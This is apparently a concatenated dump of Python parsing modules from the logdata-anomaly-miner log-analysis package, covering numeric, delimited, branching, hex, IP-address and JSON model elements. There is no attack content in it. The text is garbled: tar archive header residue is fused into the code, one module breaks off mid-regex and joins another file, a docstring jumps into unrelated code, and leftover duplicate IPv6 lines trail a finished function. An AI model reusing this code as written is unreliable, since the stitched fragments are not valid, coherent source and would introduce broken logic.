    SIGN_TYPE_MANDATORY = "mandatory"

    PAD_TYPE_NONE = "none"
    PAD_TYPE_ZERO = "zero"
    PAD_TYPE_BLANK = "blank"

    EXP_TYPE_NONE = "none"
    EXP_TYPE_OPTIONAL = "optional"
    EXP_TYPE_MANDATORY = "mandatory"

    def __init__(self, element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE,
                 exponent_type: str = EXP_TYPE_NONE):
        """
        Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
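@param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed,
        with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -.
        @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is
        allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value.
        @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential values are allowed,
        EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must contain exponential values.
        """
        super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type, exponent_type=exponent_type)
        self.digits = set(b"0123456789")

    def get_match_element(self, path: str, match_context):
        """
        Find the maximum number of bytes forming a decimal number according to the parameters specified.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return a match when at least one byte being a digit was found, None otherwise. The match_object is the float value of
        the matched bytes.
        """
        data = match_context.match_data
        # self.start_characters / self.pad_characters are derived from the sign and pad type by the parent constructor.
        if not data or (data[0] not in self.start_characters):
            return None
        match_len = 1
        # Without zero padding a leading zero may not be followed by another digit ("0.5" is fine, "01" is not).
        if self.pad_characters == b"" and data.startswith(b"0") and len(data) > 1 and data[1] in self.digits:
            return None
        # Skip the padding that may follow the first (sign or digit) character.
        for test_byte in data[match_len:]:
            if test_byte not in self.pad_characters:
                break
            match_len += 1
        num_start_pos = match_len
        for test_byte in data[match_len:]:
            if test_byte not in self.digits:
                break
            match_len += 1
        if match_len == 1 and data[0] not in self.digits:
            # A lone sign or pad character is not a number. Longer pad-only runs (e.g. "00" with zero padding) are kept on
            # purpose and reach the float() conversion below.
            return None
        # See if there is decimal part after decimal point.
        if (match_len < len(data)) and (data[match_len] == ord(b".")):
            match_len += 1
            post_point_start = match_len
            for test_byte in data[match_len:]:
                if test_byte not in self.digits:
                    break
                match_len += 1
            if match_len == post_point_start:
                # There has to be at least one digit after the decimal point.
                return None
        # See if there could be any exponent following the number.
        if (self.exponent_type != DecimalFloatValueModelElement.EXP_TYPE_NONE) and (match_len + 1 < len(data)) and (
                data[match_len] in b"eE"):
            match_len += 1
            if data[match_len] in b"+-":
                match_len += 1
            exp_number_start = match_len
            for test_byte in data[match_len:]:
                if test_byte not in self.digits:
                    break
                match_len += 1
            if match_len == exp_number_start:
                # No exponent number found.
                return None
        elif self.exponent_type == DecimalFloatValueModelElement.EXP_TYPE_MANDATORY:
            return None
        match_string = data[:match_len]
        try:
            if self.pad_characters == b" " and match_string[0] in b"+-":
                # With blank padding the sign precedes exactly one blank; any further blank makes the value invalid.
                if b" " in match_string.replace(b" ", b"", 1):
                    return None
                match_value = float(match_string.replace(b" ", b"", 1))
            else:
                match_value = float(match_string)
        except ValueError:
            # Sign and padding without any digit (e.g. "+ ") pass the scans above but are not a number; treat as no match
            # instead of letting the exception abort parsing of the whole log atom.
            return None
        match_context.update(match_string)
        return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None)
# ---- archive member: logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/DecimalIntegerValueModelElement.py ----
"""
This module defines an model element for integer number parsing.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.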
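You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.parsing.ModelElementInterface import ModelElementInterface
from aminer.parsing.MatchElement import MatchElement


class DecimalIntegerValueModelElement(ModelElementInterface):
    """
    This class defines a model to parse integer values with optional signum or padding.
    If both are present, it is signum has to be before the padding characters.
    """

    SIGN_TYPE_NONE = "none"
    SIGN_TYPE_OPTIONAL = "optional"
    SIGN_TYPE_MANDATORY = "mandatory"

    PAD_TYPE_NONE = "none"
    PAD_TYPE_ZERO = "zero"
    PAD_TYPE_BLANK = "blank"

    def __init__(self, element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE):
        """
        Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed,
        with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -.
        @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is
        allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value.
        @raise ValueError when value_sign_type or value_pad_type is not one of the class constants.
        """
        super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type)
        if value_sign_type not in (DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL,
                                   DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY):
            msg = f"Invalid value_sign_type {value_sign_type}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if value_pad_type not in (DecimalIntegerValueModelElement.PAD_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_ZERO,
                                  DecimalIntegerValueModelElement.PAD_TYPE_BLANK):
            msg = f"Invalid value_pad_type {value_pad_type}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.digits = set(b"0123456789")

    def get_match_element(self, path: str, match_context):
        """
        Find the maximum number of bytes forming a integer number according to the parameters specified.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return a match when at least one byte being a digit was found, None otherwise. The match_object is the int value of
        the matched bytes.
        """
        data = match_context.match_data
        # self.start_characters / self.pad_characters are derived from the sign and pad type by the parent constructor.
        if not data or (data[0] not in self.start_characters):
            return None
        match_len = 1
        # Without zero padding a leading zero may not be followed by another digit ("0" is fine, "01" is not).
        if self.pad_characters == b"" and data.startswith(b"0") and len(data) > 1 and data[1] in self.digits:
            return None
        # Skip the padding that may follow the first (sign or digit) character.
        for test_byte in data[match_len:]:
            if test_byte not in self.pad_characters:
                break
            match_len += 1
        for test_byte in data[match_len:]:
            if test_byte not in self.digits:
                break
            match_len += 1
        if match_len == 1 and data[0] not in self.digits:
            # A lone sign or pad character is not a number. Longer pad-only runs (e.g. "00" with zero padding) are kept on
            # purpose; int() decides below whether they form a value.
            return None
        match_string = data[:match_len]
        try:
            if self.pad_characters == b" " and match_string[0] in b"+-":
                # With blank padding the sign precedes the blank; drop that one blank before converting.
                match_value = int(match_string.replace(b" ", b"", 1))
            else:
                match_value = int(match_string)
        except ValueError:
            # Sign and padding without digits, or more than one blank after the sign.
            return None
        match_context.update(match_string)
        return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None)
# ---- archive member: logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/DelimitedDataModelElement.py ----
"""
This module defines a model element that takes any string up to a specific delimiter string.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface
import re


class DelimitedDataModelElement(ModelElementInterface):
    """Find a string delimited by given non-escaped delimiter string, possibly a match of zero byte length."""

    def __init__(self, element_id: str, delimiter: bytes, escape: bytes = None, consume_delimiter: bool = False):
        """
        Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param delimiter a non-escaped delimiter string to search for.
        @param escape a character to escape in the string.
        @param consume_delimiter True if the delimiter character should also be consumed.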
""" super().__init__(element_id, delimiter=delimiter, escape=escape, consume_delimiter=consume_delimiter) def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes before encountering the non-escaped delimiter. @return a match when at least one byte was found but not the delimiter itself. """ data = match_context.match_data match_len = -1 if self.escape is None: search = re.search(re.escape(self.delimiter), data) if search is not None: match_len = search.start() else: search = re.search(rb"(?. """ from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement from aminer import AminerConfig from typing import Union class ElementValueBranchModelElement(ModelElementInterface): """This class defines an element that selects a branch path based on a previous model value.""" def __init__(self, element_id: str, value_model: ModelElementInterface, value_path: Union[str, None], branch_model_dict: dict, default_branch: Union[str, int] = None): """ Create the branch model element. @param element_id an identifier for the ModelElement which is shown in the path. @param value_model the ModelElement which has to match the data. @param value_path the relative path to the target value from the value_model element on. When the path does not resolve to a value, this model element will not match. A path value of None indicates, that the match element of the value_model should be used directly. @param branch_model_dict a dictionary to select a branch for the value identified by valuePath. @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None. 
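"""
        self.value_path = value_path
        super().__init__(
            element_id, value_model=value_model, value_path=value_path, branch_model_dict=branch_model_dict, default_branch=default_branch)

    def get_match_element(self, path: str, match_context):
        """
        Try to find a match on given data for the test model and the selected branch.
        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against.
        @return the matchElement or None if the test model did not match, no branch was selected or the branch did not match.
        The returned element's match_string and match_object are the bytes consumed by value_model and the branch together;
        its children are [value model match, branch match].
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        model_match = self.value_model.get_match_element(current_path, match_context)
        if model_match is None:
            return None
        # From here on, the matchContext is already modified so we must NEVER just return but revert the changes in the context
        # first.
        test_match = self._resolve_value_path(model_match)
        branch_match = None
        if test_match is not None:
            branch_key = test_match.get_match_object()
            if isinstance(branch_key, bytes):
                # branch_model_dict is keyed by str, so byte values are decoded with the configured encoding first.
                branch_key = branch_key.decode(AminerConfig.ENCODING)
            branch_model = self.branch_model_dict.get(branch_key, self.default_branch)
            if branch_model is not None:
                branch_match = branch_model.get_match_element(current_path, match_context)
        if branch_match is None:
            match_context.match_data = start_data
            return None
        consumed = start_data[:len(start_data) - len(match_context.match_data)]
        return MatchElement(current_path, consumed, consumed, [model_match, branch_match])

    def _resolve_value_path(self, model_match):
        """
        Walk self.value_path component by component through the children of model_match.
        @param model_match the MatchElement produced by value_model.
        @return the MatchElement the path points to, model_match itself when self.value_path is None, or None when any
        component of the path is missing (the walk stops at the first missing component instead of dereferencing None).
        """
        remaining_value_path = self.value_path
        test_match = model_match
        current_test_path = test_match.get_path()
        while remaining_value_path is not None:
            next_part_pos = remaining_value_path.find("/")
            if next_part_pos <= 0:
                current_test_path += "/" + remaining_value_path
                remaining_value_path = None
            else:
                current_test_path += "/" + remaining_value_path[:next_part_pos]
                remaining_value_path = remaining_value_path[next_part_pos + 1:]
            match_children = test_match.get_children()
            test_match = None
            if match_children is None:
                break
            for child in match_children:
                if child.get_path() == current_test_path:
                    test_match = child
                    break
            if test_match is None:
                # No child carries this component; continuing would call get_children() on None for the next component.
                break
        return test_match
# ---- archive member: logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/FirstMatchModelElement.py ----
"""This module defines a model element that allows branches. The first matching branch is taken.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.parsing.ModelElementInterface import ModelElementInterface


class FirstMatchModelElement(ModelElementInterface):
    """This class defines a model element to return the match from the the first matching child model within a given list."""

    def __init__(self, element_id: str, children: list):
        """
        Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param children a list of child elements to be iterated through.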
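"""
        super().__init__(element_id, children=children)

    def get_match_element(self, path: str, match_context):
        """
        Try the children in list order and return the first match.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return None when there is no match, MatchElement of the first matching child otherwise.
        """
        current_path = f"{path}/{self.element_id}"
        match_data = match_context.match_data
        for child_element in self.children:
            child_match = child_element.get_match_element(current_path, match_context)
            if child_match is not None:
                return child_match
        # No child matched: make sure the context is exactly as it was before the attempt.
        match_context.match_data = match_data
        return None
# ---- archive member: logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/FixedDataModelElement.py ----
"""
This module defines a model element representing a fixed string.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class FixedDataModelElement(ModelElementInterface):
    """
    This class defines a model element of a fixed string.
    The model element is considered a match if the fixed string is found at this position in the log atom.
    """

    def __init__(self, element_id: str, fixed_data: bytes):
        """
        Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param fixed_data the byte string that has to appear verbatim at the current position for this element to match.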
If it does not fulfill the sorting criteria mentioned in the class documentation, an Exception will be raised. """ super().__init__(element_id, wordlist=wordlist) def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" data = match_context.match_data match_data = None word_pos = 0 for word in self.wordlist: if data.startswith(word): match_data = word break word_pos += 1 if match_data is None: return None match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, word_pos, None) HexStringModelElement.py000066400000000000000000000043401437606560100353540ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that represents a hex string of arbitrary length. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer import AminerConfig class HexStringModelElement(ModelElementInterface): """This class just tries to strip off as many hex bytes as possible from a given data string.""" def __init__(self, element_id: str, upper_case: bool = False): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. 
@param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase. """ super().__init__(element_id, upper_case=upper_case) def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes forming a integer number according to the parameters specified. @return a match when at least one byte being a digit was found """ m = self.hex_regex.match(match_context.match_data) if m is None: return None match_len = m.span(0)[1] match_object = match_context.match_data[:match_len] try: pad = "" if len(match_object.decode(AminerConfig.ENCODING)) % 2 != 0: pad = "0" match_string = bytes.fromhex(pad + match_object.decode(AminerConfig.ENCODING)) except ValueError: return None match_context.update(match_object) return MatchElement(f"{path}/{self.element_id}", match_string, match_object, None) IpAddressDataModelElement.py000066400000000000000000000117101437606560100361100ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that represents an IP address. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
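"""
This module defines a model element that represents an IP address.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import re

from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface

# Deliberately loose dotted-quad form; the octet range is checked afterwards in extract_ipv4_address.
# Compiled once at module level instead of on every get_match_element call.
_DOTTED_QUAD = re.compile(br"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")


class IpAddressDataModelElement(ModelElementInterface):
    """
    Model element that matches an IPv4 or IPv6 address at the current data position.

    The match string is the address text that was consumed and the match object is the address value as an integer
    (32 bit for IPv4, 128 bit for IPv6).
    """

    def __init__(self, element_id: str, ipv6: bool = False):
        """
        Create an element to match IP addresses.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise.
        """
        super().__init__(element_id, ipv6=ipv6)
        if not ipv6:
            # self.regex = re.compile(br"((2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])\.){3}(2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])")
            # use a simpler regex to improve the performance; octets above 255 are rejected by extract_ipv4_address.
            self.regex = _DOTTED_QUAD
            self.extract = extract_ipv4_address
        else:
            # modified regex from https://community.helpsystems.com/forums/intermapper/miscellaneous-topics/
            # 5acc4fcf-fa83-e511-80cf-0050568460e4?_ga=2.113564423.1432958022.1523882681-2146416484.1523557976
            # NOTE(review): the trailing "(%.+)?" group admits a zone id (e.g. "%eth0") but is unbounded, so the
            # match, and therefore the consumed match string, can run to the end of the data. extract_ipv6_address
            # ignores everything from "%" on when computing the numeric value.
            i4 = br"((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})"
            self.regex = re.compile(
                br"((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:"
                br"){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?"
                br":"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:"+i4+br")|:))|(([0-9A-Fa-f]{"
                br"1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{"
                br"1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:"+i4+br")|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:"+i4+br")|:"
                br")))(%.+)?")
            self.extract = extract_ipv6_address

    def get_match_element(self, path: str, match_context):
        """
        Read an IP address at the current data position.

        Allowed formats for IPv6 addresses are defined in RFC4291 section 2.2. However, trailing IPv4 addresses
        (for example ::FFFF:129.144.52.38) are not allowed.
        @param path the model path of the parent element.
        @param match_context the context whose match_data is read; on success the address text is consumed.
        @return a MatchElement whose match object is the integer address value, or None when nothing matched.
        """
        data = match_context.match_data
        found = self.regex.match(data)
        if found is None:
            return None
        match_len = found.end()
        if self.extract is extract_ipv6_address and _rejects_ipv6_form(found.group(), data, match_len):
            return None
        extracted_address = self.extract(found.group(), match_len)
        if extracted_address is None:
            return None
        match_string = data[:match_len]
        match_context.update(match_string)
        return MatchElement(f"{path}/{self.element_id}", match_string, extracted_address, None)


def _rejects_ipv6_form(matched: bytes, data: bytes, match_len: int) -> bool:
    """
    Refuse IPv6 candidates the parser does not support: the embedded-IPv4 notation and a "::" directly after the match.

    @param matched the text the IPv6 regex matched.
    @param data the complete match_data the match was taken from.
    @param match_len length of the match.
    @return True when the candidate must be treated as no match.
    """
    # a dot inside the last group means the unsupported ::a.b.c.d notation
    if b"." in matched[:match_len].split(b":")[-1]:
        return True
    if len(data) <= match_len:
        return False
    # the text after the last colon of the match looks like a dotted quad (the match stopped inside an
    # embedded-IPv4 form), or the match is immediately followed by another "::"
    after_last_colon = data[data.rfind(b":", 0, match_len) + 1:]
    if _DOTTED_QUAD.match(after_last_colon) is not None:
        return True
    return data.find(b"::", match_len) == match_len and b"::" in data


def extract_ipv4_address(data: bytes, match_len: int):
    """
    Calculate the integer value of a dotted-quad IPv4 address.

    @param data bytes starting with the address text; only data[:match_len] is used.
    @param match_len number of bytes the address text occupies.
    @return the 32-bit integer value, or None when an octet exceeds 255.
    """
    octets = [int(number) for number in data[:match_len].split(b".")]
    if any(number > 255 for number in octets):
        return None
    return (octets[0] << 24) + (octets[1] << 16) + (octets[2] << 8) + octets[3]


def extract_ipv6_address(data: bytes, match_len: int):
    """
    Calculate the integer value of an IPv6 address written as colon-separated hex groups.

    @param data bytes starting with the address text; only data[:match_len] is used.
    @param match_len number of bytes the address text occupies.
    @return the 128-bit integer value, or None when the text does not consist of eight (possibly "::"-compressed)
    hex groups of at most 16 bits each.
    """
    address = data[:match_len]
    # The IPv6 regex admits an optional "%zone" suffix ("fe80::1%eth0"); it is not part of the numeric value.
    # Previously the suffix reached int(), which raised an uncaught ValueError for such input.
    zone_start = address.find(b"%")
    if zone_start != -1:
        address = address[:zone_start]
    parts = address.split(b":")
    if b"" in parts:
        # "::" compresses one or more all-zero groups (also at the start or end); expand it back to eight groups.
        index = parts.index(b"")
        parts = [group for group in parts if group != b""]
        parts = parts[:index] + [b"0"] * (8 - len(parts)) + parts[index:]
    try:
        numbers = [int(b"0x" + group, 16) for group in parts]
    except ValueError:
        # non-hex content: report "no match" instead of propagating the exception into the parser
        return None
    if len(numbers) < 8 or any(number > 65535 for number in numbers):
        return None
    return (numbers[0] << 112) + (numbers[1] << 96) + (numbers[2] << 80) + (numbers[3] << 64) + (numbers[4] << 48) + (numbers[5] << 32)\
        + (numbers[6] << 16) + (numbers[7])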
parts = [number for number in parts if number != b""] parts = parts[:index] + [b"0"] * (8 - len(parts)) + parts[index:] numbers = [int(b"0x" + number, 16) for number in parts] for number in numbers: if number > 65535: return None return (numbers[0] << 112) + (numbers[1] << 96) + (numbers[2] << 80) + (numbers[3] << 64) + (numbers[4] << 48) + (numbers[5] << 32)\ + (numbers[6] << 16) + (numbers[7]) JsonModelElement.py000066400000000000000000000667371437606560100343740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that takes any string up to a specific delimiter string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import warnings import logging from typing import List, Union, Any from json import JSONDecodeError from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.AminerConfig import DEBUG_LOG_NAME warnings.filterwarnings("ignore", category=DeprecationWarning) debug_log_prefix = "JsonModelElement: " def format_float(val): """This function formats the float-value and parses the sign and the exponent.""" exp = None if "e" in val: exp = "e" elif "E" in val: exp = "E" if "+" in val: sign = "+" else: sign = "-" if exp is not None: pos_point = val.find(exp) if "." 
in val: pos_point = val.find(".") if len(val) - val.find(sign) <= 2: result = format(float(val), f"1.{val.find(exp) - pos_point}E")[:-2] result += format(float(val), f"1.{val.find(exp) - pos_point}E")[-1] return result return format(float(val), f"1.{val.find(exp) - pos_point}E") return float(val) class JsonModelElement(ModelElementInterface): """Parse single- or multi-lined JSON data.""" def __init__(self, element_id: str, key_parser_dict: dict, optional_key_prefix: str = "optional_key_", nullable_key_prefix: str = "+", allow_all_fields: bool = False): """ Initialize the JsonModelElement. @param element_id: The ID of the element. @param key_parser_dict: A dictionary of all keys with the according parsers. If a key should be optional, the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING". To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use "key": "NULL_OBJECT". @param optional_key_prefix: If some key starts with the optional_key_prefix it will be considered optional. @param nullable_key_prefix: The value of this key may be null instead of any expected value. @param allow_all_fields: Unknown fields are skipped without parsing with any parsing model. 
""" super().__init__(element_id, key_parser_dict=key_parser_dict, optional_key_prefix=optional_key_prefix, nullable_key_prefix=nullable_key_prefix, allow_all_fields=allow_all_fields) self.dec_escapes = False self.validate_key_parser_dict(key_parser_dict) def validate_key_parser_dict(self, dictionary: dict): """Validate the key_parser_dict.""" for value in dictionary.values(): if isinstance(value, ModelElementInterface): continue if isinstance(value, list): if len(value) == 0: msg = "lists in key_parser_dict must have at least one entry." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for v in value: if isinstance(v, dict): self.validate_key_parser_dict(v) elif isinstance(value, dict): self.validate_key_parser_dict(value) elif value not in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "EMPTY_STRING", "ALLOW_ALL_KEYS", "NULL_OBJECT"): msg = "wrong type found in key_parser_dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def is_escaped_unicode(self, text: str): # skipcq: PYL-R0201 """Check if the text contains only ascii characters.""" if all(ord(c) < 128 for c in text): # is escaped unicode ascii? 
return True return False def get_full_key(self, key, dictionary): """Find the full key in the dictionary.""" options = [self.optional_key_prefix + self.nullable_key_prefix + key, self.nullable_key_prefix + self.optional_key_prefix + key, self.optional_key_prefix + key, self.nullable_key_prefix + key] for option in options: if option in dictionary: return option return key def get_stripped_key(self, key): """Return the key without optional_key_prefix and nullable_key_prefix.""" if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] if key.startswith(self.nullable_key_prefix): key = key[len(self.nullable_key_prefix):] if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] return key def is_nullable_key(self, key): """Check if the key is nullable.""" return key.startswith(self.nullable_key_prefix) or ( key.startswith(self.optional_key_prefix) and key[len(self.optional_key_prefix):].startswith(self.nullable_key_prefix)) def get_match_element(self, path: str, match_context): """ Try to parse all the match_context against JSON. When a match is found, the match_context is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" old_match_data = match_context.match_data matches: Union[List[Union[MatchElement, None]]] = [] try: index = 0 # There can be a valid case in which the text contains for example \x2d, \\x2d or \\\\x2d, which basically should be decoded # into the unicode form. 
while index != -1: index = match_context.match_data.find(rb"\x") if index != -1: try: match_context.match_data = match_context.match_data.decode("unicode-escape").encode() except UnicodeDecodeError: break index = 0 while index != -1: index = match_context.match_data.find(b"\\", index) if index != -1 and len(match_context.match_data) - 1 > index and match_context.match_data[ index + 1] not in b"\\'\"abfnrtv/": match_context.match_data = match_context.match_data[:index] + b"\\" + match_context.match_data[index:] index += 2 elif index != -1: index += 2 json_match_data = json.loads(match_context.match_data, parse_float=format_float) if not isinstance(json_match_data, dict): return None except JSONDecodeError as e: logging.getLogger(debug_log_prefix + DEBUG_LOG_NAME).debug(e) return None self.dec_escapes = True if self.is_escaped_unicode(match_context.match_data.decode()): match_context.match_data = match_context.match_data.decode("unicode-escape").encode() self.dec_escapes = False matches += self.parse_json_dict(self.key_parser_dict, json_match_data, current_path, match_context) remove_chars = b' }]"\r\n' match_data = match_context.match_data for c in remove_chars: match_data = match_data.replace(bytes(chr(c), encoding="utf-8"), b"") if None in matches or (match_data != b"" and len(matches) > 0): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "get_match_element_main NONE RETURNED\n" + match_context.match_data.strip(b' }]"\r\n').decode()) match_context.match_data = old_match_data return None # remove all remaining spaces and brackets. 
